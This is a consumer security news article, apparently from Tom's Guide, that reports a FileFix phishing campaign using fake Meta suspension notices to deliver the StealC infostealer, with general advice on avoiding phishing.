A new FileFix attack is using novel lures in order to trick users into downloading malware. As reported byBleeping Computer, this latest version of the increasingly popular social engineering attack was first discovered by Acronis, who noticed that hackers have been using the FileFix technique and sending out fake Meta account suspensions in order to convince users to unknowingly download the StealC infostealer.
StealC can exfiltrate usernames and passwords from a wide variety of platforms including credentials stored in the cloud, credentials and authentication cookies from web browsers, credentials from messaging apps, cryptocurrency wallets, VPNs and gaming apps, and it can take screenshots of your desktop too. This new FileFix attack is tricking users by sending fake warning messages that appear to come from Meta’s support team. There’s even a multi-language fake webpage users are directed to after being warned that their account is about to be suspended or disabled.
Using typical phishing urgency with a deadline of seven days, it tells targets that in order to avoid account suspension they must view an “incident report” that Meta is sharing with them. The fake incident report is a disguised PowerShell command that downloads the StealC malware onto their system though.
Users are asked to click a button that says “Copy” which resembles a file path, and are instructed to open File Explorer to paste the copied file path into the address bar which they’re told will open the “incident report.” However, the fake path contains multiple spaces at the end making it easy to miss the malicious code and it’s also missing the usual # symbols that identify a ClickFix attack.
FileFix is a variant of the ClickFix family, which uses social engineering-style attacks to trick users into pasting malicious commands into operating system dialog boxes so they can ‘fix’ the problems that hackers claim they have. FileFix was created by mr.fox, a researcher, and uses the address bar in Windows’ File Explorer to execute malicious commands instead of the Windows Run dialog box which is what ClickFix uses.
How to stay safe
In its report, Acronis recommends that companies educate their users on these new tactics and the risks of copying data from a website into seemingly harmless system dialog. However, as this is a phishing attack what is most important is recognizing many of the same signs found in other phishing and social engineering campaigns.
As with any phishing campaign, If you receive a suspicious email about one of your online accounts, do not click on anything within it. Instead, simply go directly to the URL or web address of that account in your browser to see if there are messages for your there. Additionally, make sure that you enable two-factor authentication (2FA) to add an extra layer of security for your online accounts to prevent scammers from accessing them if they do manage to steal your username and password.
Finally, you want to protect your devices and your data from the latest cyber threats by making sure you have one of the best antivirus software solutions installed and up-to-date. You also want to make sure that you’re familiar with all of its extra features that can help you stay safe online like a VPN or a hardened browser.
Both FileFix and ClickFix attacks seem to be all the rage with hackers these days and unfortunately, this will likely continue until more people become aware of how they work. This is why I implore you to share your knowledge with others so that less people fall for these types of attacks. However, before doing so, make sure you’re practicing good cyber hygiene and have taken the necessary steps to secure your data and devices first.
Follow Tom’s Guide on Google News and add us as a preferred source to get our up-to-date news, analysis, and reviews in your feeds. Make sure to click the Follow button!
More from Tom’s Guide
